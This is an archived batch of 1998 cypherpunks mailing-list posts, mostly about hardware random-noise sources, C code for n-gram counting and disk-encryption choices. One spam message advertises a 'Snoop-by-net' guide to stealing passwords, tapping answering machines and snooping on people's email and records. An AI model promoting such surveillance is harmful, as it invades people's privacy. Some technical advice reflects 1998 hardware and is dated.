Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/6/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 6 Aug 1998 05:37:09 -0700 (PDT)
To: Maurice@fundi.com (Maurice Valmont)
Subject: Re: Mysterious taglines
In-Reply-To: <3.0.1.32.19980805235420.0072fa34@mail.fundi.com>
Message-ID: <199808061236.IAA06479@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Maurice Valmont wrote:
| >Crypto Anarchy: encryption, digital money,
| >anonymous networks, digital pseudonyms, zero
| >knowledge, reputations, information markets,
| >black markets, collapse of governments.
| 
| I'm curious: What exactly is "zero knowledge"?

A cool new software company involving the usual suspects.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 6 Aug 1998 09:39:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Gilmore in USA Today
Message-ID: <3.0.5.32.19980806093758.0079bec0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


	
So my wife hands me a deadtree periodical, _USA today_ Aug 5 98.

Secion D, cover: "A maverick cracks the code" with a big pic
of Gilmore, description of the DES scam, Jeffersonian
less gov't is more comment, and typical pop-media playup
of his personal bio. 

[See also "Strange Brains and Genius", by Clifford Pickover, 
for more bios :-]

The point: two or three column-feet(!) in a lowbrow high-volume rag.  Mentions
this list, too.

Not bad advertising for under $3e5 guys....






honig@alum.mit.edu

  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 6 Aug 1998 10:31:55 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Re: Noise source processing
In-Reply-To: <3.0.5.32.19980806073033.007cf540@m7.sprynet.com>
Message-ID: <3.0.5.32.19980806103120.007cfb00@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 8/6/98 -0400, mgraffam@mhv.net wrote:
>On Thu, 6 Aug 1998, David Honig wrote:
>
>> I have digitized FM radio hiss using a $10 transistor radio feeding
>> into the LINE in of my soundcard.  The spectrum looks poisson
>> with prominant, periodically spaced noise spikes.  It does not pass
Diehard.
>
>Yeah, I ran Diehard on it .. and that is why I wanted to find some
>references on removing bias.
>
>> But if you take the PARITY of 8 bits to get one bit, then assemble bytes
>> out of these bits, the results pass Diehard.
>
>This is a neat idea. I smiled when I read this in RFC1750
>
>> 1. There are some nice spectrogramming shareware programs out there.
>
>I haven't been able to find any for UNIX/X .. any recommendations
>for Win31 (I'll try it with Wabi ;) software?
>

You should probably look for native freeware, no?
Otherwise look in various win archives.

I have not yet done systematic experiments looking at, e.g., entropy in
less-than
full-amplitude noise, or intentionally filtering out various pieces
of spectrum.  The tables in RFC 1750 show that 8 bits is reasonable.

Interestingly, the parity of a $10 10year old Radio shack monophonic
FM radio, UNSHIELDED, in a digitally-noisy environment, sampled 
at 44Khz and 16 bits, passed Diehard.  

NB: Consumer computainment devices will include FM/TV receivers very shortly.
Less of a rat's nest in back of the machine.

I always thought listening to static was a suspicious activity.

A CDROM burner is $350.  "Entropy.  Its not just for ambassadors anymore."




honig@alum.mit.edu

  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 6 Aug 1998 07:42:16 -0700 (PDT)
To: David Honig <honig@sprynet.com>
Subject: Re: Noise source processing
In-Reply-To: <3.0.5.32.19980806073033.007cf540@m7.sprynet.com>
Message-ID: <Pine.LNX.3.96.980806102531.17770A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 6 Aug 1998, David Honig wrote:

> I have digitized FM radio hiss using a $10 transistor radio feeding
> into the LINE in of my soundcard.  The spectrum looks poisson
> with prominant, periodically spaced noise spikes.  It does not pass Diehard.

Yeah, I ran Diehard on it .. and that is why I wanted to find some
references on removing bias.

> But if you take the PARITY of 8 bits to get one bit, then assemble bytes
> out of these bits, the results pass Diehard.

This is a neat idea. I smiled when I read this in RFC1750

> 1. There are some nice spectrogramming shareware programs out there.

I haven't been able to find any for UNIX/X .. any recommendations
for Win31 (I'll try it with Wabi ;) software?

[source clipped]

:) Sweet. Thanks.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Two things fill the mind with ever new and increasing admiration and awe
the more often and steadily we reflect upon them: the starry heavens
above and the moral law within me. I do not seek or conjecture either of
them as if they were veiled obscurities or extravagances beyond the horizon
of my vision; I see them before me and connect them immediately with the
consciousness of my existence." - Immanuel Kant "Critique of 
Practical Reason"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 6 Aug 1998 10:41:53 -0700 (PDT)
To: "Enzo Michelangeli" <cypherpunks@toad.com>
Subject: Re: Noise source processing
In-Reply-To: <003801bdc14f$c2ec86e0$87004bca@home>
Message-ID: <3.0.5.32.19980806104032.007dbc60@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 PM 8/6/98 +0800, Enzo Michelangeli wrote:

>[[...]>The noise coming off of the sound card is more beige than white
>though..
>>
>>Does anyone know of any papers, articles or whatever on good techniques to
>>remove bias from the audio source?
>>
>>My initial thoughts are along the lines of just hashing everything, but
>>this will be slow, and I'd like to see what other ideas are out there.
>
>What about an analog filter placed before the digitizer?

The engineering issue is this: no matter how great you filter out 
the junk, you don't have a perfect analog measurement to start with.
(Note that filtering out junk reduces info content).

So the question is how to distill the bits out of your binary digits.
You need to reduce the number of bits; you need to make them equiprobable.

I have not had luck*time implementing Shannon's method for distilling bits,
mentioned as suggestion #2 in the RFC.  This method produces perfect 0:1 ratio
but takes indeterminate input bits to do so.  Please post if you play with
this.





honig@alum.mit.edu

  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberPsychotic <fygrave@freenet.bishkek.su>
Date: Wed, 5 Aug 1998 22:10:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: text analysis
Message-ID: <Pine.LNX.3.96.980806105040.20223u-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


Hello folks,
 I have abit practical question, since I know this list is partly devoted
to cryptography matters, I guess this is the right place to ask:

 So I was playing with some crypto-analysis algorythms, and some steps of
them involve such thing as finding out the frequency of some character or
set of characters. So I wonder what would be the optimal (speed, resources
etc)way of coding this. While playing with single character frequency, I
guess the best way would be having unsigned int 256 elements array (I
refer to C coding) and each time, I find certain character, i just
increase the element of the array with this char offset. This seems very
neat to me (except the thing that some chars could be never found in
text). Anyways, when things come to 2 characters set, i have to get 1024
character set, and so on, which looks quite unreasonable to me to allocate
memory for elements, which probably will be never found in text... I was
thinking of other solution and came to two way connected lists (correct
term?)  things, i.e. : i have some structure like: 

struct element {
char value[ELEMENT_LENGTH];
unsigned int frequency;
struct element *previous;
struct element *next;
}
 and could dinamically allocate memory for each new found element, but
this would slow down whole code by the time list of new elements grow up.
(b/c i will have to look thro.. whole list in order to find whether such
element has already been found or not),  so I wonder maybe there another
neat way to complete tasks like this? I would appreciate any ideas, hints,
code examples. (would be very helpful having a look on some code
performing such a task, I surfed the web but didn't find many)...

 Thanks beforehands,
 Fyodor






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Berke Durak <berke@gsu.linux.org.tr>
Date: Thu, 6 Aug 1998 02:26:39 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Re: Noise source processing
In-Reply-To: <Pine.LNX.3.96.980805210406.11770A-100000@albert>
Message-ID: <Pine.LNX.3.93.980806122350.354G-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Aug 1998 mgraffam@mhv.net wrote:

[...]
> 
> The noise coming off of the sound card is more beige than white though..
> 
> Does anyone know of any papers, articles or whatever on good techniques to
> remove bias from the audio source? 

See the RFC 1750, Randomness Recommendations for Security. D. Eastlake, 3rd, S.
Crocker & J. Schiller. December 1994. (Format: TXT=73842 bytes)

A sample from the table of contents gives:

[...]
   5. Hardware for Randomness............................... 10
   5.1 Volume Required...................................... 10
   5.2 Sensitivity to Skew.................................. 10
   5.2.1 Using Stream Parity to De-Skew..................... 11
   5.2.2 Using Transition Mappings to De-Skew............... 12
   5.2.3 Using FFT to De-Skew............................... 13
   5.2.4 Using Compression to De-Skew....................... 13
   5.3 Existing Hardware Can Be Used For Randomness......... 14
   5.3.1 Using Existing Sound/Video Input................... 14
   5.3.2 Using Existing Disk Drives......................... 14
   6. Recommended Non-Hardware Strategy..................... 14
   6.1 Mixing Functions..................................... 15
   6.1.1 A Trivial Mixing Function.......................... 15
   6.1.2 Stronger Mixing Functions.......................... 16
   6.1.3 Diff-Hellman as a Mixing Function.................. 17
   6.1.4 Using a Mixing Function to Stretch Random Bits..... 17
   6.1.5 Other Factors in Choosing a Mixing Function........ 18
   6.2 Non-Hardware Sources of Randomness................... 19
   6.3 Cryptographically Strong Sequences................... 19
[...]

Berke Durak   - berke@gsu.linux.org.tr -  http://gsu.linux.org.tr/kripto-tr/
PGP bits/keyID: 2047/F203A409 fingerprint: 44780515D0DC5FF1:BBE6C2EE0D1F56A1





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 6 Aug 1998 04:03:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: FOIA appeal
In-Reply-To: <35C8BE3D.629B@nmol.com>
Message-ID: <35C98D5B.875B030@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


bill payne wrote:

> Portions of the above document posted on Internet at
> http://www.us.net/softwar/ and  http://www.aci.net/kalliste/
> states
> 
> 1.      Gore charged with encryption policy according to PDD-5 and
>         PRD-27 on April 16, 1993.
> 
> 2.      Government officials represent themselves on Al Gore's behalf for
>         RSA patent purchase negotiations in Feb. 1994.
> 3.      RSA chairman Bidzos meets with Chinese officials at the same
>         time as Ron Brown in Oct. 1995.
> 
> 4.      RSA Chairman Bidzos enters into merger negotiations with Security
>         Dynamics, a company backed by Sanford Robertson, in Nov. 1995.
> 
> 5.      VP Gore calls Sanford Robertson from the White House for a
>         donation in Nov. 1995.
> 
> 6.      Robertson delivers $100,000 donation ($80,000 soft - $20,000
>         directly into the Clinton/Gore campaign) in Jan. 1996.
> 7.      RSA signs deal with China in Feb. 1996. The administration
>         previously prosecuted similar deals but this time does nothing.
> 8.      Justice Dept. approves RSA merger with Security Dynamics in
>         April 1996 for $280 million dollars, netting Sanford Robertson's
>         company a cool $2 million just to write the deal.

There is an old Chinese proverb: 'With money you can hire devils
to turn your mills'.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 6 Aug 1998 14:10:36 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 6, 1998
Message-ID: <199808061825.NAA27521@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/ for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information click 
http://www.wow-com.com/pdf/locntech.pdf
===========================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 6 Aug 1998 04:44:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: text analysis
In-Reply-To: <Pine.LNX.3.96.980806105040.20223u-100000@freenet.bishkek.su>
Message-ID: <35C99712.A1572FA0@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


CyberPsychotic wrote:

> text). Anyways, when things come to 2 characters set, i have to get 1024
> character set, and so on, which looks quite unreasonable to me to allocate
> memory for elements, which probably will be never found in text... I was
> thinking of other solution and came to two way connected lists (correct
> term?)  things, i.e. : i have some structure like:
> 
> struct element {
> char value[ELEMENT_LENGTH];
> unsigned int frequency;
> struct element *previous;
> struct element *next;
> }
>  and could dinamically allocate memory for each new found element, but
> this would slow down whole code by the time list of new elements grow up.

I think currently memory is cheap enough so that you could do
frequency counts of at least trigrams with one dimensional array.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Thu, 6 Aug 1998 11:27:44 -0700 (PDT)
To: David Honig <honig@sprynet.com>
Subject: Re: Noise source processing
In-Reply-To: <3.0.5.32.19980806073033.007cf540@m7.sprynet.com>
Message-ID: <19980806142436.A4371@die.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, Aug 06, 1998 at 10:31:20AM -0700, David Honig wrote:
> At 10:31 AM 8/6/98 -0400, mgraffam@mhv.net wrote:
> >On Thu, 6 Aug 1998, David Honig wrote:
> >
> >> I have digitized FM radio hiss using a $10 transistor radio feeding
> >> into the LINE in of my soundcard.  The spectrum looks poisson
> >> with prominant, periodically spaced noise spikes.  It does not pass


	This is expected of hard limiters below threshold  (such as in a
reasonable FM IF system fed Johnson noise).  The spikes occur on phase
discontinuities in the limiter output - what you are seeing is the input
Johnson noise intermittantly inducing phase jumps in the output of the
ringing IF filters shock excited by the broadband input noise.  The IF
filters tend to ring somewhat coherently until hit by another burst of
noise which sets them off on another phase.  Each phase jump shows up as
a spike on the discriminator output.  The narrower the bandwidth of the
filters, the longer the spike and interspike intervals. Thus one needs
an IF bandwidth considerably wider than the sample rate.

	Your parity scheme is pretty good, but simple zero crosses (or
crossings of the long term mean value of the waveform) aren't bad
either.   Many years ago I suggested, half seriously, that simply taking
a suitable cheap Radio Shack audio transformer and stepping the speaker
output of a cheap FM radio tuned between stations to around 15 volts and
shoving it directly into the CD or DSR input of a standard PC serial
port would work as a quicky hardware noise source (this was before the
near universality of soundcards on PCs).   The serial port pins 
incorperate a threshold comparitor in the RS-232/423 receiver chips
which would act to convert the noise to a string of 1s and 0s  that
could be sampled by reading the DSR value occasionally. Or one could use
the DSR interrupt and record the time the zero crossing occurred and use
this time stamp as a random (poisson distributed) value.

> 
> I always thought listening to static was a suspicious activity.
> 
	My wife thinks so...



-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Thu, 6 Aug 1998 05:25:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SecDrv and Win95
In-Reply-To: <98Aug5.115014cdt.36865-1@gateway.mgmtscience.com>
Message-ID: <19980806142451.61001@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, Aug 05, 1998 at 07:47:24PM -0000, nobody@nsm.htp.org wrote:
> >>>>> Ian F Silver <silveri@mgmtscience.com> writes:
> 
>   > I'm looking at CFS (Cryptographic File System) for when I make the
>   > jump away from Microsoft towards S.u.S.E. Linux 5.2.
> 
> Version 1.1.2 works quite well, but I'd really like to see someone
> build it into the kernel.  (Not me, alas: I'm up to my ears in other
> GPL applications development, and you really don't want to let me near
> an OS kernel...)

There is something called TCFS - transparent cryptographic file
system.  You could take a look at
ftp://ftp.pvv.org/pub/Linux/kerneli/v2.0/. I'm just starting a project
to provide an easy to use and up to date international patch for the
linux-kernel.  The current patch integrates the steganography and
crypto-patches for loopback filesystem, CIPE, and TCFS in one patch.
I'm looking at integrating IPsec as well, but at this time, there are
at least 5 different implementations of it.

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 6 Aug 1998 11:55:15 -0700 (PDT)
To: David Honig <honig@sprynet.com>
Subject: Re: Noise source processing
In-Reply-To: <3.0.5.32.19980806103120.007cfb00@m7.sprynet.com>
Message-ID: <Pine.LNX.3.96.980806143912.19983A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 6 Aug 1998, David Honig wrote:

> I have not yet done systematic experiments looking at, e.g., entropy in
> less-than full-amplitude noise, or intentionally filtering out various
> pieces of spectrum.

After I get the software end sorted out, I'm going to start stripping
the signal down and take look at some of this stuff too.. 

> Interestingly, the parity of a $10 10year old Radio shack monophonic
> FM radio, UNSHIELDED, in a digitally-noisy environment, sampled 
> at 44Khz and 16 bits, passed Diehard.  

Yeah, that is pretty neat .. maybe I'll tear the shielding off of my
source and see what sort of results I get. Maybe the shielding I
put in place is unnecessary.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"If you die, you win.."
	John Landry, statistics professor discussing life insurance 
	and probability





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: newsletter20@hotmail.com
Date: Thu, 6 Aug 1998 09:19:21 -0700 (PDT)
To: newsletter20@hotmail.com
Subject: Snoop by net
Message-ID: <QQfbgz13514.199808061619@pop0-alterdial.uu.net>
MIME-Version: 1.0
Content-Type: text/plain


They can get your password
They can tap into your answering machine & use it to listen into your live conversation
or listen to your messages.
They can  read your email and even use your phone line to go online. 
They can decode the phone number you are dialing in seconds.
They can dig up the dirt and secrets on anyone...

They know the back end of AOL and use its secrets to have fun on the Internet.

They can fax for free and place calls for free...   

How?
It's all to easy and we'll show you how they do it ...

Snoop-by-net reveals all.

Now you can snoop on your friends, your boss, even your enemies...
Learn how to take full advantage of the Internet and never be left curious...

Search engines are a waste of time. 
 We'll show you where to go and how to uncover the past  on your friends.

Know where your friends are online, where they have been 
Track down people using only their email address
Research employees, dates, teachers, or your neighbors...
do they have a criminal record,  have they ever been pulled over for speeding, 
 are they using a fake social security number?

We will teach you how you can quickly find out even personal information
 about anyone.

Join the over 50,000 people who have read our publication 
and learn how to turn your Internet connection into a super SNOOP machine.

Act now and get your Super Spy Links for free.

Super Spy Links offers an exhausting look at how you are
 just a couple mouse clicks away from finding out just about 
every bit or public information on someone, along with some 
scary personal information as well.


ORDER NOW:  to learn just how powerful the Internet really is.

Snoop-by-net is only $19.95 + 4.00 shipping & Handling.   

Make check or money order payable to 

CellTalk 
350 5th Ave. Suite #3916
New York, NY
10118

We will ship first class mail the same day.

or... FAX your order for faster delivery !!!

Please print and fill out each line legibly.

{ } Visa { }Mastercard  (Please check one)

CC# ______________________________________________

Expiration Date: ____________________________

Name on card: ___________________________________

Shipping Address: ___________________________________________

__________________________________________________________



Signature:_____________________________________________________


Phone Number with area code:  ___________________________________


Your credit card will be billed for $19.95 plus $4.00 shipping & handling 


Fax this CREDIT CARD offer to (212) 290-8009 for instant ordering







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 6 Aug 1998 17:31:16 -0700 (PDT)
To: die@die.com
Subject: Re: Noise source processing
In-Reply-To: <3.0.5.32.19980806103120.007cfb00@m7.sprynet.com>
Message-ID: <3.0.5.32.19980806161909.007ca100@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:24 PM 8/6/98 -0400, Dave Emery wrote:
>
>	This is expected of hard limiters below threshold  (such as in a
>reasonable FM IF system fed Johnson noise).  The spikes occur on phase
>discontinuities in the limiter output - what you are seeing is the input
>Johnson noise intermittantly inducing phase jumps in the output of the
>ringing IF filters shock excited by the broadband input noise.  The IF
>filters tend to ring somewhat coherently until hit by another burst of
>noise which sets them off on another phase.  Each phase jump shows up as
>a spike on the discriminator output.  The narrower the bandwidth of the
>filters, the longer the spike and interspike intervals. Thus one needs
>an IF bandwidth considerably wider than the sample rate.

Given that the cheapo radio was 10 cm from a 21" monitor, I don't think
you need to invoke noise-driven resonances in the humble radio.

I was/am interested in robust methods that don't depend on 
exquisite analog equalization, etc.  

Zero crossings are analogs (pun intended) of 
RFC1750's #2 method (via Shannon):

map 01 -> 1 
map 10 -> 0
00, 11 are no-ops.  

Note that for a digital signal you are detecting level-changes.  (Vdd/2
changes?)


Waiting for zero crossing will give you perfect 0:1 ratio,
but you may have to wait arbitrarily long (but will almost
certainly not, in the formal sense ---there's a decaying exponential
in there).








  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 6 Aug 1998 08:01:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: text analysis
Message-ID: <199808061501.RAA26380@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


A good data structure is a tree:

                   ----->  2nd letter
                  /                    ------> 3rd letter
                 /                    /
      1st letter ------->  2nd letter -------> 3rd letter
                 \                    \
                  \                    ------> 3rd letter
                   ----->  2nd letter
                                      \
                                       -----> 3rd letter


Start with an array indexed by the 26 letters.  Each array entry contains
a count of that letter's frequence and a pointer to a subsidary array.
The pointer starts out null.

When you find a new digraph (like the first time you find a letter after
'g') you allocate a new structure to represent the letters following 'g'.
This will again consist of 26 entries like the first one.

Likewise when you find a new trigraph, you allocate a new third-level
array of 26 entries.

This will be a compromise between space and speed.  Most digraphs don't
exist so you will save considerable space over the brute force way of
allocating an array of 26^n spaces to count n-graphs.  However it is
a bit wasteful in that it allocates a full 26 entries each time even
though only a small fraction will be used.

The last layer does not need to have the pointers allocated per letter
since you won't be looking beyond that (e.g. if you are only interested
in counting trigraphs, the third layer above can consist of just an
array of counts).

struct entry {
	int count;
	struct entry *next;
} top;

Handle letter, given array of previous letters.  prev[0] is current
letter, prev[1] is 1st previous letter, prev[2] is 2nd previous letter,
etc.  Size of prev is n entries.  Letters are normalized to range 0-25.
Untested code, hopefully it will give you the idea.

handle (int prev[], int n)
{
	struct entry *cur;

	cur = top;
	for (i=0; i<n; ++i) {
		cur[prev[i]].count += 1;
		if (i==n-1)
			break;
		if (cur[prev[i]].next == NULL)
			cur[prev[i]].next = calloc (26, sizeof(struct entry));
		cur = cur[prev[i]].next;
	}
}

This actually counts the entries backwards, so that "the" is entered under
top['e'-'a'+1]->next['h'-'a'+1]->next['t'-'a'+1].  You can correct for
this when you print them out.  Or you can store the letters in the prev
array in the opposite order, putting the current letter in prev[n-1],
then they will be in the correct order.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Thu, 6 Aug 1998 03:17:50 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: compression vs encryption
In-Reply-To: <199808031315.PAA15001@replay.com>
Message-ID: <Pine.GSO.3.96.980806180821.3539B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


What's the difference between compression and encryption?


Correct me if I'm wrong,  in compression we lose something, like in 
image compression and audio compression,  but in encryption, we don't. 

One sure protection againts evil hackers is encryption (?), but what if 
that evil hacker deletes the ciphertext file and the plain text file (that
is assuming the evil hacker just deletes every file he wants to delete).
---at least he/she didn't read/saw the file.

















===============================================================================
You give the words  you have spoken,
   it is not lended and are not taken back.
It is like what The Corrs sung "...you're forgiven not forgotten...."

bbt@mudspring.uplb.edu.ph
bbt@peak-two.uplb.edu.ph
metaphone@altavista.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 6 Aug 1998 23:12:56 -0700 (PDT)
To: Mok-Kong Shen <fygrave@freenet.bishkek.su>
Subject: Re: text analysis
In-Reply-To: <Pine.LNX.3.96.980806105040.20223u-100000@freenet.bishkek.su>
Message-ID: <3.0.5.32.19980806202007.0090e140@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:44 PM 8/6/98 +0100, Mok-Kong Shen wrote:
>CyberPsychotic wrote:
>> text). Anyways, when things come to 2 characters set, i have to get 1024
>> character set, and so on, which looks quite unreasonable to me to allocate
>> memory for elements, which probably will be never found in text... I was
>> thinking of other solution and came to two way connected lists (correct
>> term?)  things, i.e. : i have some structure like:
>> 
>> struct element {
>> char value[ELEMENT_LENGTH];
>> unsigned int frequency;
>> struct element *previous;
>> struct element *next;
>> }
>>  and could dinamically allocate memory for each new found element, but
>> this would slow down whole code by the time list of new elements grow up.
>
>I think currently memory is cheap enough so that you could do
>frequency counts of at least trigrams with one dimensional array.

RAM is cheap - any 486 computer and most 386 computers has at least 4MB.
In the US, most new PCs have 16MB or more, and many have 64MB.
But learning how to program efficiently is still important :-)
And some computers have operating systems that make it hard
to use all of the RAM.
Disk is cheaper - almost all new computers have 1GB or more,
and most older desktops have at least 200MB.
You probably should use 32-bit integers to store your counters,
but you need to make sure your program does the right thing
if you exceed counts of 2**31.

Are you counting all kinds of text, or only words made of alphabetic
characters and spaces and punctuation, or only ASCII 127-bit?
Your 1024 number is 32*32, which sounds like only alphabetic and spaces;
if that's good enough, you could do 32*32*32*32 with 4-byte counts
and still fit in 4MB.
If you want all 256 possible 8-bit characters, two characters 
requires 64K counters (256KB).   Trigrams require 16 million counters
if you allocate space for them all, which is 64MB, and may be expensive.
But you could store 256*256 pointers in 256KB, and allocate memory
for 256-counter arrays only for the digrams that appear,
and probably save lots of memory.  You could also store the counts on disk, 
and keep only the more frequently used arrays of counts in RAM.
This was how we did things in the old days, when almost everything
was too big for RAM, and it really is much slower if you're not careful :-)
If you have a machine with a real operating system, you can 
pretend keep your counters in RAM and let the operating system
decide what to page out to disk.  Think about this carefully,
because it can be very fast or very slow depending on how
well you write your programs.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 6 Aug 1998 23:12:56 -0700 (PDT)
To: "Ian F. Silver" <cypherpunks@toad.com
Subject: Re: SecDrv and Win95
In-Reply-To: <199808050819.KAA06317@replay.com>
Message-ID: <3.0.5.32.19980806202703.008a8e60@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM 8/5/98 -0500, Ian F. Silver wrote:
>I found an interesting "mount a container as a drive letter"
>encryption program in finland called "BestCrypt NP", [...]
>It has three algorithms that you can pick from for encryption:
> GOST28147-89 (32 rounds, 256 bits primary key, 512 bits secondary key)
> Blowfish (in Cipher Block Chaining Mode with 256-bit key length and 16 rounds)
> DES
>I use Blowfish and GOST (depending on the size of the container I'm
>working with), and avoided DES, even before Deep Crack was invented. 

Never Never Trust GOST !!!  
The security of GOST depends on the quality of the S-Boxes (or whatever
the equivalent fields in GOST are called).  The Soviets provided
different sets for military and civilian use, and unless you know a lot
about the design, you can't tell strong ones from weak ones -
you have to worry about differential and linear cryptanalysis,
plus any other attacks that may have been developed over the years.
You're better off using 3DES if you like old slow algorithms;
in this case, I'd stick to Blowfish.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 6 Aug 1998 18:50:43 -0700 (PDT)
To: David Honig <honig@sprynet.com>
Subject: Re: Noise source processing
In-Reply-To: <3.0.5.32.19980806161909.007ca100@m7.sprynet.com>
Message-ID: <Pine.LNX.3.96.980806213923.22910A-100000@albert>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 6 Aug 1998, David Honig wrote:

> Zero crossings are analogs (pun intended) of 
> RFC1750's #2 method (via Shannon):
> 
> map 01 -> 1 
> map 10 -> 0
> 00, 11 are no-ops.  

RFC1750 attributes this to von Neumann.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
They (who) seek to establish systems of government based on the
regimentation of all human beings by a handful of individual rulers..
call this a new order. It is not new, and it is not order."
				- Franklin Delano Roosevelt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FRETELUCO@aol.com
Date: Thu, 6 Aug 1998 19:07:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: whut up
Message-ID: <9214be44.35ca6128@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


looking for a place to have some Band stickers made, can you email me a phone
number so we can check out some prices.....thanks TIm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ZeroInt <zeroint@birmingham.crosswinds.net>
Date: Thu, 6 Aug 1998 20:11:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: whut up
In-Reply-To: <9214be44.35ca6128@aol.com>
Message-ID: <199808070311.UAA15026@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 PM 8/6/98 -0400, FRETELUCO@aol.com wrote:
>looking for a place to have some Band stickers made, can you email me a phone
>number so we can check out some prices.....thanks TIm
> 

Yeah, I checked out some prices.  Looks so so.  Here's the number
1-800-eat-shit or 1-800-then-die 
